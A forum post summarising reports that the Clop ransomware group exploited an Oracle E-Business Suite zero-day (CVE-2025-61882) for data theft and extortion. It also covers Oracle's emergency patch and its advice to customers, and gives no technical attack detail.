• Hello and welcome! Register to enjoy full access and benefits:

    • Advertise in the Marketplace section for free.
    • Get more visibility with a signature link.
    • Company/website listings.
    • Ask & answer queries.
    • Much more...

    Register here or log in if you're already a member.

  • 🎉 WHV has crossed 56000 (56k) monthly views (unique) and 285135 clicks per month, as per Google Analytics! Thank you for your support! 🎉

Clop Ransomware Exploits Oracle E-Business Suite 0-Day in Alleged Major Breach

johny899

New Member
Content Writer
Messages
920
Reaction score
3
Points
23
Balance
$1,137.5USD
I would like to share some knowledge that is pretty serious. Clop, a ransomware group, may have gained access to Oracle E-Business Suite via a new zero-day vulnerability (a 0-day). My immediate thought was, “How did they even do that?”

What We Know​

In a report, the security researchers have communicated that the vulnerability (CVE-2025-61882) is very dangerous because it allows a hacker to log into Oracle E-Business Suite without any login. Essentially an attacker can walk in like they live there.

Clop has been using this vulnerability since August 2025, in combination with gaining access to a host of company data and demanding money from companies. Additionally, the security team at Google said that Clop had emailed the head of companies and discussed their files that they had allegedly stolen.

How the Hack Works​

The attack, as described by experts, came in tiers. Clop managed to use this 0-day vulnerability along with additional methods they employed to gain full control.

They also use fileless malware, meaning that the attack does not install traditional files. Instead, they hide small programs inside Java processes, including:
  • GOLDVEIN.JAVA
  • SAGEWAVE
  • SKYLANE
This makes it more challenging to notice the attack. After they gain entry, they take data and threaten to release it unless the companies pay them a ransom.

Oracle’s Response​

Oracle did not remain silent. They aggressively issued an emergency patch to fix the vulnerability. This patch is applicable to Oracle E-Business Suite versions 12.2.3 to 12.2.14.

Oracle called for customers to:
  • Install security updates
  • Install the new emergency patch
  • Investigate their systems using indicators of compromise (IOCs) which indicate a possible presence of a hacker

Why This Is a Big Deal​

This is not a small story. This is a zero-day attack, meaning no one knew about this bug until the hacker used it. Companies use Oracle E-Business Suite for important matters like finance, and HR, supply chain, and managing customers. If hackers get in there, they can do a lot of damage.

What makes this scarier is that the exploit code is now in the wild, meaning the chances of other hackers trying the same attack is higher.
 
You must log in or register to reply here.
Menu
Log in
Register